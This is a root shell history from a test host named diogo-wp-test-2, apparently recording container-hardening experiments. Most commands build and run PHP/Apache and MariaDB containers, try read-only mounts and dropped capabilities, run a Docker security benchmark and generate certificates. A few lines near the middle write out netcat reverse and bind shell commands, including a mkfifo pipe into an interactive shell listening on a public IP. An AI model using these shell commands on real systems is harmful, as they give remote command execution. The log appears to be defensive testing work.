    1  curl get.docker.io | sh
    2  curl https://get.docker.io | sh
    3  git@github.com:docker-library/php.git
    4  ls
    5  git clone git@github.com:docker-library/php.git
    6  cd php/
    7  ls
    8  cd 5.6
    9  docker build -t diogomonica/apache .
   10  ls
   11  docker run -d -e MYSQL_ROOT_PASSWORD=example mariadb
   12  docker ps
   13  docekr run -p 80:80 --link grave_newton:mysql diogomonica/apache
   14  docker run -p 80:80 --link grave_newton:mysql diogomonica/apache
   15  ls
   16  vim Dockerfile
   17  docker build -t diogomonica/apache .
   18  cd apache/
   19  ls
   20  docker build -t diogomonica/apache .
   21  ls
   22  docker run -p 80:80 --link grave_newton:mysql diogomonica/apache
   23  docker ps
   24  ls
   25  docker run -p 80:80 --link grave_newton:mysql diogomonica/apache
   26  netstat -nltp
   27  cd /var/www
   28  docker ps
   29  docker exec -it e47d875154d7 /bin/bash
   30  docker ps
   31  docker exec -it c5c8d570c8b9 /bin/bash
   32  ls
   33  cd php/
   34  ls
   35  cd 5.6/apache/
   36  ls
   37  vim index.php
   38  vim Dockerfile
   39  docker build -t diogomonica/apache .
   40  docker run -p 80:80 --link grave_newton:mysql diogomonica/apache
   41  docker ps
   42  docekr stop grave_kowalevski
   43  docker stop grave_kowalevski
   44  docker build -t diogomonica/apache .
   45  docker run -p 80:80 --link grave_newton:mysql diogomonica/apache
   46  docker run -p 80:80 --link grave_newton:mysql --read-only diogomonica/apache
   47  docker run -p 80:80 --link grave_newton:mysql /tmp:/var/run/apache2 --read-only diogomonica/apache
   48  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 --read-only diogomonica/apache
   49  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
   50  docker run -p 80:80 --link grave_newton:mysql -v /tmp/apache2.pid:/var/run/apache2/apache2.pid -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
   51  touch /tmp/apache2.pid
   52  docker run -p 80:80 --link grave_newton:mysql -v /tmp/apache2.pid:/var/run/apache2/apache2.pid -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
   53  docker run -p 80:80 --link grave_newton:mysql -v /tmp/apache2.pid:/var/run/apache2/ -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
   54  cd /tmp/apache2.pid/
   55  ls
   56  cd ..
   57  rm -rf apache2.pid/
   58  touch apache2.pid
   59  ls
   60  cat apache2.pid
   61  docker run -p 80:80 --link grave_newton:mysql -v /tmp/apache2.pid:/var/run/apache2/apache2.pid -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
   62  docker run -p 80:80 --link grave_newton:mysql -v /tmp/apache2.pid:/var/run/apache2/apache2.pid:rw -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
   63  docker run -p 80:80 -p 443:443 -d tropicloud/np-stack
   64  docker ps
   65  docker exec -it suspicious_sinoussi /bin/bash
   66  docker ps
   67  docker stop suspicious_sinoussi
   68  docker run -p 80:80 -p 443:443 --read-only -d tropicloud/np-stack
   69  docker ps
   70  docker run -p 80:80 -p 443:443 --read-only tropicloud/np-stack
   71  ls
   72  history
   73  ls
   74  cd php/
   75  ls
   76  cd 5.6
   77  ls
   78  cd apache/
   79  ls
   80  vim index.php
   81  docker ps
   82  ls
   83  ps aux
   84  ls
   85  cd php/5.6
   86  cd apache/
   87  ls
   88  vim index.html
   89  docker ps
   90  docker exec -it tender_sammet /bin/bash
   91  ls
   92  docker ps
   93  docker stop tender_sammet
   94  docker ps
   95  docker exec -it romantic_morse /bin/bash
   96  ls
   97  docker ps
   98  docekr stop romantic_morse
   99  docker stop romantic_morse
  100  docker ps
  101  docker stop stoic_stallman
  102  docker ps
  103  docker stop insane_ritchie
  104  cd php
  105  cd 5.6
  106  cd apache/
  107  ls
  108  vim index.php
  109  docker build -t diogomonica/apache .
  110  docker ps
  111  docker exec -it sharp_pike /bin/bash
  112  docker ps
  113  docker exec -it sick_engelbart /bin/bash
  114  aa-status
  115  cd /etc/apparmor.d/
  116  ls
  117  cdcat docker
  118  cat docker
  119  vim docker
  120  cd php/5.6/apache/
  121  ls
  122  wget https://raw.githubusercontent.com/tropicloud/np-stack/master/etc/html/index.html
  123  ls -alh
  124  rm -rf .index.php.swp
  125  ls
  126  ls -alh
  127  rm -rf .index.html.swp
  128  ls
  129  ls -alh
  130  docker run -p 80:80 --link grave_newton:mysql -v /tmp/apache2.pid:/var/run/apache2/apache2.pid:rw -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
  131  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
  132  ls
  133  vim index.
  134  vim index.php
  135  mv index.php index.php.old
  136  mv index.html index.php
  137  vim index.php
  138  docker build -t diogomonica/apache .
  139  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
  140  vim index.php
  141  cat index.php.old
  142  vim index.php
  143  docker build -t diogomonica/apache .
  144  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
  145  ls
  146  vim index.php.old
  147  vim index.php
  148  docker build -t diogomonica/apache .
  149  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
  150  vim index.php
  151  docker build -t diogomonica/apache .
  152  docker ps
  153  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
  154  vim index.php
  155  docker build -t diogomonica/apache .
  156  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
  157  ls
  158  cat DOc
  159  cat Dockerfile
  160  ls
  161  touch run.sh
  162  vim run.sh
  163  vim Dockerfile
  164  ls
  165  chmod +x run.sh
  166  ls -alh
  167  vim run.sh
  168  docker build -t diogomonica/apache .
  169  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
  170  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only --entrypoint /bin/bash diogomonica/apache
  171  id
  172  pwd
  173  ls -alj
  174  ls -alh
  175  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only --entrypoint /bin/bash diogomonica/apache
  176  echo $?
  177  docker run -it -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only --entrypoint /bin/bash diogomonica/apache
  178  ls
  179  vim run.sh
  180  docker build -t diogomonica/apache .
  181  docker run -it -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only --entrypoint /bin/bash diogomonica/apache
  182  vim run.sh
  183  docker build -t diogomonica/apache .
  184  cat /usr/local/bin/ru
  185  cat /usr/local/bin/run.sh
  186  docker run -it -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only --entrypoint /bin/bash diogomonica/apache
  187  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
  188  vim run.sh
  189  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
  190  docker build -t diogomonica/apache .
  191  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
  192  ls
  193  vim run.sh
  194  docker build -t diogomonica/apache .
  195  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
  196  ls
  197  vim DOck
  198  vim Dockerfile
  199  docker build -t diogomonica/apache .
  200  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
  201  docker run -p 80:80 -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
  202  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
  203  ls
  204  vim Dockerfile
  205  vim run.sh
  206  docker build -t diogomonica/apache .
  207  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
  208  ls
  209  vim index.php
  210  docker build -t diogomonica/apache .
  211  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
  212  ls
  213  vim index.php
  214  docker build -t diogomonica/apache .
  215  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
  216  vim index.php
  217  docker build -t diogomonica/apache .
  218  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
  219  ls alh
  220  ls -alh
  221  docker run -p 80:80 --link grave_newton:mysqldiogomonica/apache
  222  docker run -p 80:80 --link grave_newton:mysql diogomonica/apache
  223  ls
  224  vim index.php
  225  docker build -t diogomonica/apache .
  226  docker run -p 80:80 --link grave_newton:mysql diogomonica/apache
  227  docker run -p 80:80 diogomonica/apache
  228  ls
  229  vim index.php
  230  docker build -t diogomonica/apache .
  231  docker run -p 80:80 --link grave_newton:mysql diogomonica/apache
  232  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2 -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
  233  docker ps
  234  docker stop sick_engelbart
  235  docker ps
  236  docker stop sick_davinci
  237  docker ps
  238  docker stop condescending_rosalind
  239  docker ps
  240  docker exec -it angry_curie /bin/bash
  241  docker ps
  242  docker stop angry_curie
  243  docker ps
  244  docker exec -it agitated_mcclintock /bin/bash
  245  docker ps
  246  docker stop agitated_mcclintock
  247  docker ps
  248  docker stop hungry_ardinghelli
  249  docker ps
  250  docker stop serene_rosalind
  251  docker ps
  252  docker diff drunk_einstein
  253  docker ps
  254  docker commit bf971b52cca2
  255  docker stop drunk_einstein
  256  docker run -it 2287d1c3f1ca47001f4f570402d5e53c39655d29a9b22bbf4396e679ed8ab199 /bin/bash
  257  docker ps
  258  docker stop
  259  docker stop compassionate_davinci
  260  docker ps
  261  ls
  262  cd php/5.6/
  263  ls
  264  cd apache/
  265  ls
  266  cat Dockerfile
  267  cat run.sh
  268  docker ps
  269  docker stop serene_mcclintock
  270  docker ps
  271  ls
  272  cd php/5.6
  273  ls
  274  cd apache/
  275  ls
  276  vim index.php
  277  docker build -t diogomonica/apache .
  278  docker run -p 80:80 --link grave_newton:mysql diogomonica/apache
  279  ls
  280  vim index.php
  281  docker build -t diogomonica/apache .
  282  docker run -p 80:80 --link grave_newton:mysql diogomonica/apache
  283  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2/ -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
  284  docker build -t diogomonica/apache .
  285  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2/ -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
  286  ls
  287  cat run.sh
  288  vim run.sh
  289  docker build -t diogomonica/apache .
  290  docker run -p 80:80 --link grave_newton:mysql -v /tmp:/var/run/apache2/ -v /tmp:/var/lock/apache2/ --read-only diogomonica/apache
  291  docker run -p 80:80 --link grave_newton:mysql -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ --read-only diogomonica/apache
  292  docker ps
  293  docker stop modest_torvalds
  294  docker ps
  295  docker exec -it stupefied_yalow /bin/bash
  296  docker ps
  297  docker diff stupefied_yalow
  298  docker ps
  299  docker commit stupefied_yalow
  300  docker ps
  301  docker stop stupefied_yalow
  302  docker run -it 02cef21a7500956675c0dc35c4efb91c2e007f72973e8de8bf36d243cbd18668 /bin/bash
  303  ls
  304  docker ps
  305  docker stop
  306  docker stop adoring_torvalds
  307  ls
  308  cd php/
  309  ls
  310  cd 5.6
  311  ls
  312  cat Dockerfile
  313  ls
  314  cd apache/
  315  ls
  316  cat docker-php-ext-
  317  cat Dockerfile
  318  cat run.sh
  319  vim run.sh
  320  docker ps
  321  docker stop hungry_jang
  322  docker ps
  323  docker exec -it goofy_tesla /bin/bash
  324  docker ps
  325  docker stop goofy_tesla
  326  docker ps
  327  docker exec -it hungry_sammet /bin/bash
  328  cd /tmp
  329  ls
  330  cat apache2.pid
  331  docker exec -it hungry_sammet /bin/bash
  332  ls
  333  cd
  334  cd php/5.6
  335  ls
  336  cd apache/
  337  ls
  338  cat Dockerfile
  339  ls /tmp
  340  ls -alh /
  341  ls
  342  cat run.sh
  343  docker ps
  344  docker stop hungry_sammet
  345  docker ps
  346  docker exec clever_brattain -it /bin/bash
  347  docker exec -it clever_brattain  /bin/bash
  348  cd /tmp
  349  ls -alh
  350  docker ps
  351  docker run -it --net host --pid host -v /var/run/docker.sock:/var/run/docker.sock -v /usr/lib/systemd:/usr/lib/systemd -v /etc:/etc --label docker-bench-security diogomonica/docker-bench-security
  352  docker ps
  353  docker kill clever_brattain
  354  cd php/
  355  cd 5.6
  356  cd apache/
  357  ls
  358  cat Dockerfile
  359  ls
  360  vim run.sh
  361  vim Dockerfile
  362  docker build -t diogomonica/apache .
  363  docker run -p 80:80 --link grave_newton:mysql -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ --read-only diogomonica/apache
  364  docker run -p 80:80 --link grave_newton:mysql diogomonica/apache
  365  ls
  366  vim apache2.conf
  367  docker run -p 80:80 --link grave_newton:mysql diogomonica/apache
  368  docker build -t diogomonica/apache .
  369  docker run -p 80:80 --link grave_newton:mysql diogomonica/apache
  370  docker run -p 80:80 --link grave_newton:mysql -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ --read-only diogomonica/apache
  371  docker run -p 80:80 --link grave_newton:mysql -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ --read-only --cap-drop chmod diogomonica/apache
  372  docker run -p 80:80 --link grave_newton:mysql -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ --read-only --cap-drop kill diogomonica/apache
  373  docker run -p 80:80 --link grave_newton:mysql -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ --read-only --cap-drop kill diogomonica/apache m
  374  docker run -p 80:80 --link grave_newton:mysql -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ --read-only --cap-drop kill diogomonica/apache
  375  docker run -p 80:80 --link grave_newton:mysql -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ --read-only --cap-drop chown diogomonica/apache
  376  docker run -p 80:80 --link grave_newton:mysql -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/  --cap-drop chown diogomonica/apache
  377  docker run -p 80:80 --link grave_newton:mysql -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ --read-only diogomonica/apache
  378  docker ps
  379  docker kill berserk_babbage
  380  docker ps
  381  docker kill loving_blackwell
  382  docker ps
  383  docker kill happy_fermat
  384  cd php/
  385  ls
  386  cd 5.6
  387  ls
  388  cd apache/
  389  ls
  390  cat Dockerfile
  391  docker ps
  392  docker diff happy_meitner
  393  docker commit happy_meitner
  394  docker kill happy_meitner
  395  docker run -it 8e2af934d1f83c150eda6c0d7996c029c537aa0bb50844309bed3d9c2a1cbf0b /bin/bash
  396  docker ps
  397  docker kill loving_leakey
  398  nc -e /bin/bash 6000
  399  cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 1234 > /tmp/f
  400  ifconfig
  401  cat /tmp/f | /bin/sh -i 2>&1 | nc -l 104.236.187.146 6000 > /tmp/f
  402  rm -f /tmp/f; mkfifo /tmp/f
  403  cat /tmp/f | /bin/sh -i 2>&1 | nc -l 104.236.187.146 6000 > /tmp/f
  404  docker ps
  405  docker kill loving_hodgkin
  406  docker ps
  407  docker exec -it furious_yonath /bin/bash
  408  docker ps
  409  docker kill hungry_lalande
  410  docker ps
  411  docker exec -it romantic_pike /bin/bash
  412  docker ps
  413  docker kill romantic_pike
  414  docker ps
  415  docker exec -it berserk_lumiere /bin/bash
  416  docker ps
  417  docker kill berserk_lumiere
  418  docker ps
  419  docker kill romantic_lovelace
  420  docker ps
  421  docker kill silly_fermat
  422  docker run -p 80:80 --link grave_newton:mysql -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ --read-only diogomonica/apache
  423  docker run -p 80:80 diogomonica/apache
  424  ls
  425  cd php/5.6/apache/
  426  ls
  427  cat Dockerfile
  428  ls
  429  docker build -t diogomonica/apache .
  430  ls
  431  vim index.php
  432  docker run -p 80:80 --link grave_newton:mysql diogomonica/apache
  433  docker run -p 80:80 --link db:mysql diogomonica/apache
  434  ls
  435  vim index.php
  436  docker build -t diogomonica/apache .
  437  docker run -p 80:80 --link db:mysql diogomonica/apache
  438  ls
  439  vim index.php
  440  docker run -p 80:80 --link db:mysql diogomonica/apache
  441  ls
  442  vim index.php
  443  docker run -p 80:80 --link db:mysql diogomonica/apache
  444  docker build -t diogomonica/apache .
  445  docker run -p 80:80 --link db:mysql diogomonica/apache
  446  docker run -p 80:80 --link grave_newton:mysql -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ --read-only diogomonica/apache
  447  docker run -p 80:80 --link db:mysql -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ --read-only diogomonica/apache
  448  ls
  449  vim Dockerfile
  450  docker run -p 80:80 --link db:mysql -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ --read-only diogomonica/apache
  451  vim Dockerfile
  452  docker build -t diogomonica/apache .
  453  docker run -p 80:80 --link db:mysql -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ --read-only diogomonica/apache
  454  vim Dockerfile
  455  docker build -t diogomonica/apache .
  456  docker run -p 80:80 --link db:mysql -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ --read-only diogomonica/apache
  457  vim Dockerfile
  458  docker build -t diogomonica/apache .
  459  docker run -p 80:80 --link db:mysql -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ --read-only diogomonica/apache
  460  docker run -p 80:80 --link db:mysql -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ diogomonica/apache
  461  docker run -p 80:80 a9c603d8a7b0daee3887abc8b586408b4fcccf6a71203bff89e55ca1e6eb1296
  462  docker run -p 80:80 --link db:mysql -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ diogomonica/apache
  463  vim Dockerfile
  464  docker build -t diogomonica/apache .
  465  vim Dockerfile
  466  docker build -t diogomonica/apache .
  467  docker run -p 80:80 --link db:mysql -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ diogomonica/apache
  468  vim Dockerfile
  469  docker build -t diogomonica/apache .
  470  docker run -p 80:80 --link db:mysql -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ diogomonica/apache
  471  ls
  472  vim index.php
  473  docker build -t diogomonica/apache .
  474  docker run -p 80:80 --link db:mysql -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ --read-only diogomonica/apache
  475  docker ps
  476  docker kill mad_shockley
  477  docker stop grave_newton
  478  docker run -d -e MYSQL_ROOT_PASSWORD=example mariadb
  479  docker ps
  480  docker kill elated_davinci
  481  docker ps
  482  docker kill mad_goodall
  483  docker run -d -e MYSQL_ROOT_PASSWORD=example --name db mariadb
  484  docker ps
  485  docker kill db
  486  docker start db
  487  docker ps
  488  docker kill compassionate_newton
  489  docker kill db
  490  docker start db
  491  docker ps
  492  docker kill
  493  docker kill determined_kirch
  494  docker ps
  495  docker nostalgic_euclid
  496  docker kill nostalgic_euclid
  497  docker ps
  498  docker exec -it stupefied_bohr /bin/bash
  499  docker ps
  500  docker kill stupefied_bohr
  501  docker ps
  502  docker kill boring_newton
  503  docker ps
  504  docker diff nostalgic_blackwell
  505  docker exec -it nostalgic_blackwell /bin/bash
  506  docker ps
  507  docker kill nostalgic_blackwell
  508  docker ps
  509  docker diff hungry_mestorf
  510  docker commit hungry_mestorf
  511  docker kill hungry_mestorf
  512  docker run -it eb3275c337bf44b61c92caf885c10f6eda48908ed87dbd51bc06ad808dc61115 /bin/bash
  513  docker ps
  514  docker kill nostalgic_perlman
  515  docker ps
  516  docker kill trusting_ritchie
  517  docker ps
  518  docker exec -it sick_meitner /bin/bash
  519  docker ps
  520  docker kill sick_meitner
  521  docker ps
  522  docker exec -it suspicious_nobel /bin/basg
  523  docker exec -it suspicious_nobel /bin/bash
  524  docker ps
  525  docker kill suspicious_nobel
  526  docker ps
  527  docker exec -it stoic_payne /bin/bash
  528  docker ps
  529  docker kill stoic_payne
  530  docker ps
  531  docker exec -it furious_fermi /bin/bash
  532  docker ps
  533  docker diff furious_fermi
  534  docker commit furious_fermi
  535  docker kill furious_fermi
  536  docker ps
  537  docker kill berserk_yonath
  538  docker ps
  539  docker exec -it goofy_hodkin
  540  docker exec -it goofy_hodkin /bin/bash
  541  docker exec -it goofy_hodgkin /bin/bash
  542  docker ps
  543  docker kill goofy_hodgkin
  544  docker ps
  545  docker psddasdadsdas
  546  docker ps
  547  docker kill loving_rosalind
  548  docker ps
  549  docker kill goofy_wright
  550  docker run -it --net host --pid host -v /var/run/docker.sock:/var/run/docker.sock -v /usr/lib/systemd:/usr/lib/systemd -v /etc:/etc --label docker-bench-security diogomonica/docker-bench-security
  551  docker ps
  552  docker stop cranky_blackwell
  553  docker ps
  554  docker stop db
  555  docker ps
  556  docker run db
  557  docker start db
  558  docker ps
  559  docker kill adoring_thompson
  560  docker ps
  561  docker kill drunk_yalow
  562  docker ps
  563  docker kill db
  564  docker ps
  565  docker kill dreamy_sinoussi
  566  docker start db
  567  docker ps
  568  docker kill modest_euclid
  569  docker ps
  570  docker diff ecstatic_galileo
  571  docker ps
  572  docker commit ecstatic_galileo
  573  docker kill ecstatic_galileo
  574  docker run -it 892c98f73438faecd0515e9d3329fae064ca8c4949a3a629d682fbd3dfa23228 /bin/bash
  575  docker ps
  576  docker kill agitated_bardeen
  577  cd php/5.6/apache/
  578  cat Dockerfile
  579  docker build -t diogomonica/apache .
  580  docker run -p 80:80 diogomonica/apache
  581  docker run -p 80:80 --link db:mysql diogomonica/apache
  582  ls
  583  vim index.php
  584  docker build -t diogomonica/apache .
  585  docker ps
  586  cat Dockerfile
  587  docker build -t diogomonica/apache .
  588  ls
  589  docker run -p 80:80 diogomonica/apache
  590  ls
  591  docker run -p 80:80 --link db:mysql diogomonica/apache
  592  ls
  593  vim index.php
  594  docker build -t diogomonica/apache .
  595  docker run -p 80:80 --link db:mysql diogomonica/apache
  596  docker run -p 80:80 --link db:mysql -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ --read-only diogomonica/apache
  597  docke run library/nginx
  598  docker run library/nginx
  599  docker run -p 80:80 library/nginx
  600  docker run -p 80:80 -p 443:443 library/nginx
  601  docker run -p 80:80 -p 443:443 bb4d128883a8dc61d2a48c83671b6c9019b5545feed8f4ea1049b52f7ba4fab8
  602  docker ps
  603  ifconfig
  604  docker ps
  605  netstat -nltp | grep 80
  606  netstat -nltp
  607  docker ps
  608  docker exec -it sharp_pare /bin/bas
  609  docker exec -it sharp_pare /bin/bash
  610  ls
  611  docker ps
  612  netstat -ntl[
  613  netstat -ntlp
  614  docker ps
  615  docker kill sleepy_yalow
  616  docker logs
  617  docker logs sleepy_yalow
  618  netstat -ntlp
  619  ifconfig
  620  docker ps
  621  docker kill sick_stallman
  622  netstat -nltp
  623  ifconfig
  624  docker ps
  625  docker kill jolly_bell
  626  cd php/
  627  ls
  628  cd 5.6
  629  ls
  630  cd apache/
  631  ls
  632  cat Dockerfile
  633  ls
  634  vim apache2
  635  vim apache2.conf
  636  docker build -t diogomonica/apache .
  637  docker ps
  638  docker exec -it prickly_einstein /bin/bash
  639  docker ps
  640  docker diff prickly_einstein
  641  docker ps
  642  docker commit prickly_einstein
  643  docker kill prickly_einstein
  644  docker ps
  645  docker stop df710e1b66a8
  646  docker stop e88535bfc215
  647  shutdown now
  648  ls
  649  git clone git@github.com:rcrowley/certified.git
  650  cd certified/
  651  ls
  652  apt-get install ruby-ronn
  653  make install
  654  apt-get install make
  655  make install
  656  ls
  657  certified
  658  ls
  659  mkdir certs
  660  cd certs/
  661  certified-ca C="US" ST="CA" L="San Francisco" O="Trust" CN="Docker CA"
  662  ls
  663  cd etc/ssl/
  664  ls
  665  cd certs/
  666  ls
  667  openssl x509 root-ca.crt -text
  668  openssl x509 -in root-ca.crt -text
  669  openssl x509 -in ca.crt -text
  670  ls
  671  cat root-ca.crt
  672  ls
  673  certified CN="trusted.docker.com"
  674  cd ..
  675  certified CN="trusted.docker.com"
  676  ls
  677  sh test.sh
  678  ls
  679  rm -rf etc/
  680  sh test.sh
  681  cat test.sh
  682  ls
  683  cat test.sh
  684  ls
  685  cd i
  686  cd lib/
  687  ls
  688  cat certified.sh
  689  cd ..
  690  ls
  691  vim test.sh
  692  sh test.sh
  693  ls
  694  cd certified-hYpl9t/
  695  ls
  696  cd etc/
  697  ls
  698  cd encrypted-ssl/
  699  ls
  700  cd certs/
  701  ls
  702  openssl -in ca.crt -text
  703  openssl x509 -in ca.crt -text
  704  openssl x509 -in root-ca.crt -text
  705  diff ca.crt root-ca.crt
  706  ls
  707  openssl x509 -in certificate.crt -text
  708  ls
  709  cd ..
  710  rm -rf certified-hYpl9t/
  711  ls
  712  certified-ca C="US" ST="CA" L="San Francisco" O="Docker" CN="Docker CA"
  713  ls
  714  cd etc/ssl/
  715  ls
  716  cat defaults.sh
  717  ls
  718  cd private/
  719  ls
  720  cd ..
  721  ls
  722  cd certs/
  723  ls
  724  openssl x509 -in ca.crt -text
  725  openssl x509 -in root-ca.crt -text
  726  openssl x509 -in ca.crt -text
  727  cd ..
  728  certified CN="secure.docker.com"
  729  ls
  730  ls -alh etc/ssl/certs/
  731  cat etc/ssl/certs/secure.docker.com.crt
  732  ls
  733  cat etc/ssl/certs/root-ca.crt
  734  cat etc/ssl/certs/ca.crt
  735  ls
  736  mv etc etc_old
  737  certified-ca C="US" ST="CA" L="San Francisco" O="Docker" CN="Docker CA"
  738  certified CN="secure.docker.com"
  739  ls
  740  cd etc
  741  ls
  742  cd ssl/
  743  ls
  744  cd certs/
  745  ls
  746  cat secure.docker.com.crt
  747  ls
  748  cd php
  749  ls
  750  cd 5.6
  751  ls
  752  cd apache/
  753  ls
  754  cd ..
  755  ls
  756  tar cvf apache.tar apache/
  757  ls
  758  docker ps
  759  docker exec -it dreamy_mcclintock9 sh
  760  docker ps
  761  history
  762  history | grep run
  763  docker run -p 80:80 apache
  764  docker ps
  765  docker kill mad_heisenberg
  766  docker run -p 80:80 diogomonica/apache
  767  history
  768  ls
  769  docker ps
  770  docekr run -p 80:80 diogomonica/apache
  771  docker run -p 80:80 diogomonica/apache
  772  ls
  773  cd php/
  774  ls
  775  cd 5.6
  776  ls
  777  cd apache/
  778  ls
  779  vim install.sh
  780  docker ps
  781  docker build -t diogomonica/apache .
  782  docker run -p 80:80 diogomonica/apache
  783  vim Dockerfile
  784  docker build -t diogomonica/apache .
  785  ls
  786  vim Dockerfile
  787  docker build -t diogomonica/apache .
  788  docker run -p 80:80 diogomonica/apache
  789  ls
  790  history
  791  ls
  792  cd php/5.6
  793  ls
  794  cd php/5.6/
  795  ls
  796  cd ..
  797  tar cvf 5.6.tar 5.6/
  798  ls
  799  rm 5.6.tar
  800  cd ..
  801  tar cvf php.tar php/
  802  history
root@diogo-wp-test-2:~#
